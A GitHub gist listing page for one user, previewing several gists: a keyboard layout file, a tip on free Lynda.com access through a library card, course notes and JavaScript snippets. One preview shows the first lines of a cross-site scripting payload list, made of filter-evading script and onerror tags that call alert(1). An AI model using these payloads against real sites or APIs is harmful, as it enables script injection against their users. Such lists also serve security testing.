Skip to content

Instantly share code, notes, and snippets.

View RaDeleon's full-sized avatar
🥊
Focusing

Angelo De Leon RaDeleon

🥊
Focusing
View GitHub Profile
@RaDeleon
RaDeleon / 666_lines_of_XSS_vectors.html
Created October 9, 2019 04:20 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@RaDeleon
RaDeleon / qmk_dz60_r1.json
Created June 25, 2019 18:25 — forked from armno/qmk_dz60_r1.json
QMK - DZ60
{"version":1,"keyboard":{"keys":[{"id":0,"legend":"~\n`","state":{"x":0,"y":0,"r":0,"rx":0,"ry":0,"w":1,"h":1,"x2":0,"y2":0,"w2":0,"h2":0},"row":0,"col":0,"keycodes":[{"id":"KC_GESC","fields":[]},{"id":"KC_GRV","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]}]},{"id":1,"legend":"!\n1","state":{"x":1,"y":0,"r":0,"rx":0,"ry":0,"w":1,"h":1,"x2":0,"y2":0,"w2":0,"h2":0},"row":0,"col":1,"keycodes":[{"id":"KC_1","fields":[]},{"id":"KC_NO","fields":[]},{"id":"M()","fields":[1]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id":"KC_TRNS","fields":[]},{"id"
@RaDeleon
RaDeleon / LyndaSub.md
Created September 28, 2018 03:30 — forked from BaReinhard/LyndaSub.md
Free Lynda.com Membership

Free Lynda.com Membership

  1. Signup for Los Angeles Library Card Online
  1. Signup for Lynda.com Account using Card number and Pin here
  • You will be emailed your Card Number, and by default the Pin will be the last 4 digist of your phone number used during signup
  1. Follow the form prompts you you'll be good to go.
@RaDeleon
RaDeleon / fsw-14-components-i.markdown
Created September 20, 2018 18:13
FSW 14: Components - I
@RaDeleon
RaDeleon / fsw-14-class-syntax.markdown
Created September 20, 2018 18:11
FSW 14: Class Syntax
@RaDeleon
RaDeleon / fsw-14-prototypes.markdown
Created September 20, 2018 18:10
FSW 14: Prototypes
@RaDeleon
RaDeleon / fsw-14-this-keyword.markdown
Created September 20, 2018 18:10
FSW 14: This Keyword
@RaDeleon
RaDeleon / fsw-14-components-ii-complete.markdown
Created September 20, 2018 18:09
FSW 14 - Components - II-Complete
@RaDeleon
RaDeleon / LICENSE
Created September 10, 2018 19:03 — forked from ourmaninamsterdam/LICENSE
Arrayzing - The JavaScript array cheatsheet
The MIT License (MIT)
Copyright (c) 2015 Justin Perry
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
@RaDeleon
RaDeleon / 0-array.js
Created November 9, 2017 03:18 — forked from mpj/0-array.js
Code to the video - "Map: Part 2 of Functional Programming in JavaScript"
var animals = [
{ name: 'Fluffykins', species: 'rabbit' },
{ name: 'Caro', species: 'dog' },
{ name: 'Hamilton', species: 'dog' },
{ name: 'Harold', species: 'fish' },
{ name: 'Ursula', species: 'cat' },
{ name: 'Jimmy', species: 'fish' }
]